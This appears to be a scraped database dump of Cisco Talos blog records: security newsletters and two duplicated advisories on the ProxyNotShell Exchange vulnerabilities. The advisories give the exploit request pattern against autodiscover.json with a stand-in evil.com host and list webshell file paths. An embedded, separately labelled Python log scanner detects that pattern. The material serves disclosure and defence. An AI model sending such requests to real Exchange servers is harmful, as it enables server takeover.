CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.\n\n## Top security headlines from the week \n\n\nMore than 2 million Australians' personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company's CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver's license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>))\n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. 
([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>))\n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>))\n\n## Can't get enough Talos?\n\n * [Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)\n * [Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)\n * [Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)\n * [Talos Takes Ep. 
#115: An \"insider threat\" doesn't always have to know they're a threat](<https://www.buzzsprout.com/2018149/episodes/11413990>)\n * [Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)\n * [Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>)\n\n## Upcoming events where you can find Talos\n\n**_Cisco Security Solution Expert Sessions_ (Oct. 11 & 13)** \nVirtual\n\n**_GovWare 2022_ (Oct. 18 - 20)** \nSands Expo & Convention Centre, Singapore\n\n**_Conference On Applied Machine Learning For Information Security_ (Oct. 20 - 21)** \nSands Capital Management, Arlington, Virginia", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 
6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:FB5080C7655BA3C4C2856F34457CBCD0", "href": "https://blog.talosintelligence.com/threat-source-newsletter-oct-6-2022-continuing-down-the-privacy-policy-rabbit-hole/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. 
Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/hafnium-update/>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://www.techtarget.com/searchsecurity/news/252502308/Cisco-Talos-Exchange-Server-flaws-accounted-for-35-of-attacks>) last year.\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. 
Open-source reporting indicates that webshells such as AntSword (a popular Chinese-language open-source webshell), [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) (an ASP.NET-based webshell) and [China Chopper](<https://blog.talosintelligence.com/china-chopper-still-active-9-years-later/>) have been deployed on compromised systems, with the following artifacts observed:\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n\nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.\n\nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil; however, these TTPs may change as more threat actors start exploiting the vulnerabilities and follow up with their own post-exploitation activities.\n\n## Coverage\n\nWays our customers can detect and block this threat are listed below.\n\n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. 
Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&utm_campaign=amp-free-trial&utm_term=pgm-talos-trial&utm_content=amp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&utm_source=cisco&utm_campaign=cmd-free-trial-request&utm_term=pgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&utm_campaign=umbrella-free-trial&utm_term=pgm-talos-trial&utm_content=automated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source=talos&utm_medium=referral&utm_campaign=duo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nCisco Talos is releasing SID **60642** to protect against CVE-2022-41040. \n \nIn addition, we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. 
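As an added example (not Talos or Cisco code), the defender's side of the request shape and artifact paths quoted above, in Python: it parses constructed IIS W3C log lines from the Exchange front end, flags autodiscover.json requests whose query carries the bogus "@host/" prefix or the embedded Email=autodiscover path (after percent-decoding and case-folding) while passing a legitimate Autodiscover call whose Email value also contains "@", and sweeps a host for the listed webshell drop locations. It assumes IIS logging with the c-ip, cs-uri-stem and cs-uri-query fields enabled; every log line and file it uses is constructed.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Request shape from the advisory, after percent-decoding: the query opens with a
# bogus "@host/" prefix that names the backend endpoint, and the Email parameter
# embeds a second autodiscover.json path.  All matching is case-insensitive.
AUTODISCOVER_STEM_RE = re.compile(r"/autodiscover/autodiscover\.json$", re.I)
LEADING_HOST_RE = re.compile(r"^@[^/&]+/", re.I)
EMBEDDED_EMAIL_RE = re.compile(r"(?:^|&)email=autodiscover/autodiscover\.json\?", re.I)
POWERSHELL_RE = re.compile(r"/powershell(?:[/?&]|$)", re.I)

# Webshell drop locations listed in the advisory, relative to the system drive.
WEBSHELL_ARTIFACTS = (
    r"inetpub\wwwroot\aspnet_client\Xml.ashx",
    r"Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx",
    r"Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx",
    r"Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx",
)

# Constructed IIS W3C excerpt (not real telemetry): a benign OWA hit, a legitimate
# Autodiscover call whose Email value contains "@" (must NOT flag), and two
# ProxyNotShell-shaped requests, the second percent-encoded and mixed case.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2022-09-28 10:01:02 203.0.113.7 GET /owa/auth/logon.aspx url=https://mail.corp.example/owa/&reason=0 200
2022-09-28 10:01:05 198.51.100.5 POST /autodiscover/autodiscover.json Email=alice@corp.example 200
2022-09-28 10:01:09 203.0.113.7 POST /autodiscover/autodiscover.json @evil.com/powershell&Email=autodiscover/autodiscover.json%3f@evil.com 200
2022-09-28 10:01:11 203.0.113.7 POST /Autodiscover/Autodiscover.json %40evil.com/PowerShell&Email=autodiscover/autodiscover.json%3f%40evil.com 401
""".splitlines()


def classify_request(stem, query):
    """Tag one request; an empty set means nothing ProxyNotShell-like was seen."""
    tags = set()
    if not AUTODISCOVER_STEM_RE.search(stem):
        return tags
    decoded = unquote(query or "")  # %3f -> ?, %40 -> @, before matching
    if LEADING_HOST_RE.search(decoded):
        tags.add("autodiscover-host-prefix")
    if EMBEDDED_EMAIL_RE.search(decoded):
        tags.add("autodiscover-email-embed")
    # The RCE stage (CVE-2022-41082) needs the PowerShell endpoint behind the
    # proxy, so only report it when the SSRF shape is present as well.
    if tags and POWERSHELL_RE.search(decoded):
        tags.add("powershell-backend")
    return tags


def scan_iis_log(lines):
    """Return (line_no, client_ip, sorted_tags) for each suspicious W3C log line."""
    fields, hits = None, []
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the directive
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        cols = line.split(" ")
        if len(cols) != len(fields):
            continue  # malformed line: skip rather than crash the sweep
        rec = dict(zip(fields, cols))
        query = rec.get("cs-uri-query", "-")
        tags = classify_request(rec.get("cs-uri-stem", ""), "" if query == "-" else query)
        if tags:
            hits.append((no, rec.get("c-ip", "?"), sorted(tags)))
    return hits


def find_webshell_artifacts(system_root):
    """Return the advisory artifact paths that exist below system_root (e.g. C:\\)."""
    return [rel for rel in WEBSHELL_ARTIFACTS
            if os.path.isfile(os.path.join(system_root, *rel.split("\\")))]


def demo_artifact_check():
    """Build a throwaway tree holding one listed artifact name and sweep it."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "inetpub", "wwwroot", "aspnet_client", "Xml.ashx")
        os.makedirs(os.path.dirname(target))
        with open(target, "w") as fh:
            fh.write("<!-- constructed placeholder, not a real webshell -->")
        return find_webshell_artifacts(root)


if __name__ == "__main__":
    for no, ip, tags in scan_iis_log(SAMPLE_LOG):
        print(f"line {no}: {ip} -> {', '.join(tags)}")
    print("artifacts present:", demo_artifact_check())
```

The host-prefix and embedded-Email checks fire independently, so a log hit with only one of them is still worth a look; the PowerShell tag is the one that separates the SSRF probe from an attempt at the RCE stage.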
\n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n\n## IOCs\n\n### IPs and URLs\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T21:16:00", "id": "TALOSBLOG:A52D0C18F59637804E33FC802E4F7F00", "href": "https://blog.talosintelligence.com/threat-advisory-microsoft-warns-of-actively-exploited-vulnerabilities-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T06:04:38", "description": "\n\nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) vulnerabilities collectively referred to as 
\"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3D2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/2021/03/hafnium-update.html>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://blog.talosintelligence.com/2022/01/talos-incident-response-year-in-review.html>) last year. 
\n\n## Vulnerability details and ongoing exploitation\n\nExploit requests for these [vulnerabilities](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of webshells for continued access to compromised servers. [Open-source reporting](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) indicates that webshells such as AntSword (a popular Chinese-language open-source webshell), [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) (an ASP.NET-based webshell) and [China Chopper](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) have been deployed on compromised systems, with the following artifacts observed:\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n\nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. 
\n\nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil; however, these TTPs may change as more threat actors start exploiting the vulnerabilities and follow up with their own post-exploitation activities.\n\n## Coverage\n\nWays our customers can detect and block this threat are listed below.\n\n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). 
\n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. 
\n \nIn addition, we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n\n## IOCs\n\n### IPs and URLs\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T13:40:20", "id": "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "href": "http://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T19:17:55", "description": 
"_By Jon Munshaw._\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\nOctober is National Cybersecurity Awareness Month, which, if you\u2019ve been on social media at all the past 13 days or read any cybersecurity news website, you surely know already. \n\nAs it does every year, I saw Cybersecurity Awareness Month kick off with a [lot of snark](<https://www.washingtonpost.com/politics/2022/10/04/dread-sincerity-comedy-cybersecurity-awareness-month/>) and [memes](<https://twitter.com/NSA_CSDirector/status/1576879730006974464>) of people joking about what it even means to be \u201caware\u201d of cybersecurity and why we even have this month at all. And I get why it\u2019s easy to poke fun at: it is, at its core, a marketing-driven campaign, and hardcore security experts and researchers have notoriously pushed back against this being a marketing-driven field. \n\nI\u2019m not saying there should be Cybersecurity Awareness Month mascots brought to life on the floor of Black Hat, but it is probably time to pump the brakes on the skepticism and snark. After all, this week should be about broadening the security community, not trying to exclude others from it. I came to Talos almost five years ago at this point knowing little to nothing about security. I had written about everything from ballet dancing to local government ordinances and zoning laws in my previous field, but the second someone mentioned a \u201ccontainer\u201d in relation to computers I could only picture the big metal ones on the decks of freighter boats. 
The only reason I\u2019ve made it to this point in my career is the support of my employer and co-workers, and their openness to these kinds of conversations. \n\nAnd even five years into the field, I still have so much more to learn. But an easy way for me to digest security is through these high-level conversations, memes, \u201cawareness\u201d stories and \u201cexplain like I\u2019m five\u201d questions. \n\nMy sister-in-law recently had her Instagram account hacked by some bitcoin-mining operation, to the point she just had to cut her losses and create a new account. Before that, she didn\u2019t know that enabling multi-factor authentication in Instagram was even an option, or that, because one of her passwords had been compromised on one site, an attacker might try that same password on another site with an easy-to-guess email address. \n\nMy wife never thought to check the \u201cTo\u201d field of her emails when one claims the Post Office is holding a package for her, before realizing the link is from \u201cussps.zone\u201d or something. In those cases, they quite literally are not aware of the security risks; it\u2019s not that they were willingly ignoring them. \n\nThat\u2019s why I think National Cybersecurity Awareness Month is still important. It\u2019s not for the security practitioners who have been following the same group of 100 people for the past 10 years; it\u2019s for the public, who do need to become more aware of the current cybersecurity risks that are out there. It's probably worth putting the jokes aside for a week or two just to take the time to tell someone why they shouldn\u2019t click on any link that\u2019s texted to them from a number with the same area code as them. \n\nThat\u2019s how I learned, and that\u2019s how a lot of my colleagues have learned \u2014 just by asking questions (some of which may seem dumb at first). 
If you want to make it easier to start a conversation with any of your friends and family this October about security, any of the resources on [Cisco\u2019s NCSAM page](<https://www.cisco.com/c/en/us/products/security/national-cybersecurity-awareness-month.html>) are a great place to start. \n\n## The one big thing\n\nMicrosoft [released its monthly security update Tuesday](<https://blog.talosintelligence.com/2022/10/microsoft-patch-tuesday-for-october.html>), disclosing 83 vulnerabilities across the company\u2019s hardware and software lines, including seven critical issues in Windows\u2019 point-to-point tunneling protocol. October's security update features 11 critical vulnerabilities, with the remainder being \u201cimportant.\u201d \n\n> ### Why do I care? \n> \n> Many of the critical vulnerabilities included in this month\u2019s security release could lead to remote code execution, which is usually the worst of the worst when it comes to vulnerabilities. One of the most notable vulnerabilities Microsoft fixed this month is [CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>), a remote code execution issue in Microsoft SharePoint. There are several other SharePoint vulnerabilities included in this month\u2019s Patch Tuesday, though this seems the most severe, as Microsoft considers it \u201cmore likely\u201d to be exploited. \n> \n> ### So now what?\n> \n> Patch all your Microsoft hardware and software as soon as possible in accordance with the guidance the company provides on its [update page](<https://msrc.microsoft.com/update-guide/>). Talos has also released several Snort rules to protect against the exploitation of many of these vulnerabilities. 
\n\n> \n\n## Top security headlines from the week\n\n \n\n\nThe Killnet Russian state-sponsored threat actor took credit for several high-profile cyber attacks this week, including the disruption of websites belonging to major American airports and state governments. The group posted on Telegram that it was behind a distributed denial-of-service attack on several airports\u2019 sites, including Los Angeles International, Chicago O'Hare and Hartsfield-Jackson International in Atlanta, some of the largest in the U.S. However, no flight operations were disrupted. Prior to that, they also carried out DDoS attacks against state government-run websites in Colorado, Connecticut, Kentucky and Mississippi, including local election committees. Killnet also took responsibility for disrupting bank JP Morgan\u2019s infrastructure, though the bank denied it experienced any negative effects from the attack. ([NPR](<https://www.npr.org/2022/10/10/1127902795/airport-killnet-cyberattack-hacker-russia>), [SC Magazine](<https://www.scmagazine.com/analysis/cybercrime/amid-reports-of-jp-morgan-cyberattack-experts-call-killnet-unsophisticated-media-hungry>), [StateScoop](<https://statescoop.com/russia-ukraine-killnet-ddos-state-governments/>)) \n\nMicrosoft updated its mitigations for the so-called \u201cProxyNotShell\u201d zero-day vulnerabilities in Exchange Server after security researchers found the initial recommendations could be bypassed. However, there was no formal patch for the issues in this week\u2019s Patch Tuesday as some had expected. An attacker could exploit the flaws to achieve remote code execution on the underlying server. Microsoft also says it's investigating a possibly different vulnerability in Exchange Server that\u2019s being exploited in the wild, though they aren\u2019t ruling out that the new report could be connected to ProxyNotShell. 
([The Hacker News](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>), [The Register](<https://www.theregister.com/2022/10/11/october_patch_tuesday/>), [The Record](<https://therecord.media/microsoft-investigating-alleged-exchange-zero-day/>)) \n\nFacebook warned more than a million users that their login credentials could have been stolen if they downloaded one of 400 malicious apps on the Google Play and Apple app stores. The malicious apps disguised themselves as mobile games, photo editing or fitness tracking apps, among others, according to Facebook. Users who may have logged into Facebook through the malicious app could have had their information stolen. Facebook has already notified the users affected, warning them to enable two-factor authentication on their accounts and change their passwords. Forty-seven of the apps existed on the Apple store, while the remainder were Android-based. ([CNET](<https://www.cnet.com/tech/services-and-software/facebook-says-these-400-apps-might-have-stolen-user-logins/>), [Engadget](<https://www.engadget.com/meta-warns-malicious-third-party-apps-apple-google-120049486.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #116: The latest on Lockbit 3.0 drama and the rest of the ransomware landscape](<https://www.buzzsprout.com/2018149/episodes/11457844>)_\n * _[Threat Roundup for Sept. 30 to Oct. 7](<https://blog.talosintelligence.com/2022/10/threat-roundup-0930-1007.html>)_\n * _[How ransomware turned into the stuff of nightmares for modern businesses](<https://www.techradar.com/features/how-ransomware-turned-into-the-stuff-of-nightmares-for-modern-businesses>)_\n * _[VMware Patches Code Execution Vulnerability in vCenter Server](<https://www.securityweek.com/vmware-patches-code-execution-vulnerability-vcenter-server>)_\n 